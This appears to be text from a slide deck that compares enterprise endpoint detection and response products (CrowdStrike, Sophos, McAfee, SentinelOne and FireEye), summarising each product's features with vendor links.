2. 2
Typical Features to look in an EDR software.
ALERTS / NOTIFICATIONS:
Send alerts and notify critical stake holders whenever the
Solution discovers a threat or anomaly in the network.
ANOMALY / MALWARE DETECTION:
Scan and detect potentially dangerous and harmful software
that can disrupt or damage an endpoint or gain unauthorized
access to a network.
REPORTING / ANALYTICS:
View and track metrics related to network security.
REMEDIATION MANAGEMENT:
Identify and implement steps to restore systems to optimal
conditions.
BEHAVIOURAL ANALYTICS:
Continuously track the behavior of the systems connected to a
network to check for anomalies.
CONTINUOUS MONITORING:
Continuously assess and monitor system health and
application usage.
4. 4
CROWDSTRIKE FALCON INSIGHT
Crowdstrike Falcon is an EDR module as part of the Falcon
Endpoint Protection Enterprise solution, which includes NGAV,
threat intelligence, USB device protection and threat hunting.
EDR Features:
Automatically uncovers stealthy attackers - applies
Behavioral analytics to detect traces of suspicious behavior.
5. 5
CROWDSTRIKE FALCON INSIGHT
EDR Features:
Integrates with threat intelligence - faster detection of the
activities, tactics, techniques and procedures identified as
malicious.
Fast remediation and real-time response - isolates an
endpoint under attack from the network; provides built-in
remote execution commands including deleting a fill, killing
a process, running a script, restart/shutdown.
Information Collectors - enable analysts to explore file
system, list running processes, retrieve windows event lots,
extract process memory, collect environment variables, etc.
Remediation actions enable teams to take action to
contain or remediate a threat with speed and decisiveness.
https://mysoftwhere.com/product/falcon-insight
6. 6
SOPHOS INTERCEPT X
Sophos Intercept X advanced with XDR integrates powerful
endpoint detection and response (EDR) with the industry’s top
rated endpoint protection. Built for both IT security operations
and threat hunting, Intercept X detects and investigates
suspicious activity with AI-driven analysis. Unlike other EDR
tools, it adds expertise, not headcount by replicating the skills of
hard-to-find analysts.
7. 7
SOPHOS INTERCEPT X
EDR Features:
Threat hunting - Proactive 24/7 hunting by our elite team
of threat analysts. Determine the potential impact and
context of threats to your business.
Incident response - Initiates actions to remotely disrupt,
contain and neutralize threats on your behalf to stop even
the most sophisticated threats.
Continuous Improvement - Get actionable advice for
addressing the root cause of recurring incidents to stop
them for occurring again.
XDR Enabled - Sophos XDR is included so Sophos analysts
can detect and neutralize security threats from all available
data sources while you can identify and remediate IT issues
across your estate.
https://mysoftwhere.com/product/sophos-intercept-x
8. 8
McAfee MVISION EDR
McAfee MVISION EDR helps you get ahead of modern threats
with AI-guided investigations that surface relevant risks and
automate and remove the manual labor of gathering and
analyzing evidence.
MVISION EDR reduces mean time to detect and respond to
threats by enabling all analysts to understand alerts, fully
investigate and quickly respond. Advanced analytics broaden
detection and make sense of alerts. Artificial intelligence (AI)
guided investigations and automation equip even novice
analysts on how to analyze at a higher level.
9. 9
McAfee MVISION EDR
EDR Features:
File, Fileless and Zero-day threat defenses - Local and
cloud based detections along with machine learning
analyze the latest threats no matter how they attempt to
avoid detection.
Unified Management - A single pane of glass for
windows, McAfee, and third-party technologies, along with
combined dashboards and policy management, help you
visualize threats and take action in less time.
Automatic remediation & Credential theft
monitoring – Instead of reimaging or repairing an infected
machine, MVISION Endpoint returns it to a healthy state. It
blocks attempts to harvest user credentials, preventing
potential breaches before they can begin.
10. 10
McAfee MVISION EDR
EDR Features:
Spend less time managing policies - Remove redundant
policy management by creating McAfee, Windows
Defender, Antivirus, Defender Exploit Guard and Windows
Firewall policies in one motion
Prioritized Data at a Glance - A single console gives
visibility into threats and compliance. An easy-to-use
dashboard and configurable alerts guide you to the most
important data..
https://mysoftwhere.com/product/mvision-edr
11. 11
SENTINELONE SINGULARITY
An advanced EDR tool that uses AI-powered threat detection
and response. It combines EDR and endpoint protection
platform (EPP) capabilities and operates across all aspects of a
network, including endpoints, containers, cloud workloads and
internet of things (IoT) devices.
Its patented behavioral and static AI models provide powerful
automation for identifying and blocking threats. SentinelOne
offers protection against executable, memory-only malware,
exploits in documents, spear phishing emails, macros, drive-by
downloads and other browser exploits, scripts such as
PowerShell, and credential encroachments.
12. 12
SENTINELONE SINGULARITY
EDR Features:
Administration - SentinelOne simplifies endpoint
management. It offers a centralized console for managing assets
and discovering and controlling devices.
Detection and response - Machine learning and AI allow
SentinelOne to anticipate and identify threats in real-time. It
continuously hunts for threats throughout a network, using
patented behavioral AI to recognize potentially malicious
behavior.
It can detect file less, zero-day and nation-grade attacks.
SentinelOne also provides automated response. When threats
are detected, it can isolate quarantine and even remediate
issues without human intervention.
13. 13
SENTINELONE SINGULARITY
EDR Features:
Analytics - Part of what makes SentinelOne such a powerful
solution is its analytics-based approach to threat detection and
response. The combination of data collection, behavioral
analysis. AI and machine learning, as well as robust incident
reporting, provides an abundance of threat intelligence to
proactively identify new threats and offer remediation.
https://mysoftwhere.com/product/sentinelone-active-edr
14. 14
FIREEYE ENDPOINT SECURITY
FireEye Endpoint is a standalone endpoint product. It integrates
with the FireEye Helix security operations platform, which
includes endpoint and network detection, ingests third-party
alerts from firewalls, and enables automation back to the
endpoint.
FireEye Endpoint Security supports the investigation of
sophisticated breaches, as well as detection and prevention
capabilities to help respond to threats that bypass traditional
endpoint defenses. It also includes AV through an OEM
partnership. What it terms nation-state grade threat intelligence
is characterized as a differentiator. It also harnesses multiple
detection engines and contextual enterprise search.
15. 15
FIREEYE ENDPOINT SECURITY
EDR Features:
Continuous real-time monitoring - FireEye EDR works
through continuous monitoring of the endpoint using
indicators of Compromise (IoC). The automated nature of
EDR security allows.
Streamlined threat detection process
Instant threat detection
Investigation, reporting and response enablement
Complete Visibility across entire network - FireEye EDR
offers complete, in-depth visibility across all the
organizations endpoints, with all devices covered for threat
detection.
Manage many thousands of endpoint agents
Detect threats across the organization
Centralized management console
16. 16
FIREEYE ENDPOINT SECURITY
EDR Features:
Rapid incident response times - FireEye EDR is able to
respond to threats in real-time. Many endpoint threats can
bypass traditional and advanced security in the time it takes
for a human to respond to the activity. With EDR clients will
benefit from:
Automated detection process
Significantly reduced time to detection
Ability to respond within minutes
https://mysoftwhere.com/product/fireeye-endpoint-security